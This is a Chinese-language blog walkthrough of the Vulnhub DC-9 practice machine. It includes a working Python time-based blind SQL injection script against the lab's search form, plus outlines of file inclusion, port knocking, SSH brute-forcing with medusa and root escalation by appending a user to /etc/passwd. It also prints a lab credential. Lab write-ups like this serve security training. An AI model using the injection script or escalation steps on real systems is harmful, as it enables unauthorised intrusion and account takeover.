Vulnhub dc-9

作者: const27 分类: All,靶机们 发布时间: 2020-07-09 17:03

dc终章

nmap扫出80端口,访问网页,php站,御剑开扫,没扫出有用的

根据dc-8的套路,试着找了找sql注入点,找到了

似乎是时间盲注,脚本安排上(其实联合注入也行orz

import requests
#python3.6
url="http://192.168.1.9/results.php"
proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}
result=''
for x in range(1, 100):
    high = 127
    low = 32
    mid = (low + high)// 2
    while high > low:
        payload= "1'^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where table_schema=database()),{},1))>{})#".format(x,mid)
        data={"search":payload}
        a=requests.post(url,proxies=proxies,data=data)
        if "Scott Morrison" in a.text:
            low=mid+1
        else:
            high=mid
        mid=(low+high)//2
    result+=chr(mid)
    print(result)

因为是本地,所以爆破速度究极快
很轻松拿到了admin密码(加密)

揭秘一下

另外要提的是我们在users库里的Userdetails表里找到了username列和password列

okkk,拿去登录

进来了,似乎没啥用?就想用刚刚那个注入点直接into outfile写shell,结果不行..看wp了

居然又是诡异的LFI(本地包含)orz,说是从下面那个file not exists 看出来的

然后呢,就是端口敲门服务的利用
何为端口敲门,简单理解就是按顺序向指定顺序的一串端口发包,就会让服务器开启某个服务端口。其敲门规则存储在/etc/ knockd.conf
我们去看看

看到了如何开放ssh端口,去敲敲门,按顺序访问以上端口,建议用
namp -p port host 指令
nmap再扫扫,ssh’端口出来了

ssh端口打开
结合上面说到的username和password,用medusa爆破ssh账户
medusa要比hydra快很多感觉
4个线程要稳定点

爆破出的账户的其中之一

登陆上去,扫suid,无可利用点

测试sudo,无sudo权限
uname -a

最后在janitor的隐藏目录下找到了这个

拿去再用medesa爆破,但死活爆破不出wp里用新密码爆破出来的新用户,我吐了 fredf B4-Tru3-001
直接登陆吧,sudo -l

执行一下这个命令

不是很懂,于是向上翻翻目录,找到了test.py。cat一下

看来test命令源码就是这个。把第二个参数的文件的值写入到第三个参数文件后面。那就再/etc/passwd创建root用户吧.

完事

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

Leave a Reply

Your email address will not be published. Required fields are marked *

标签云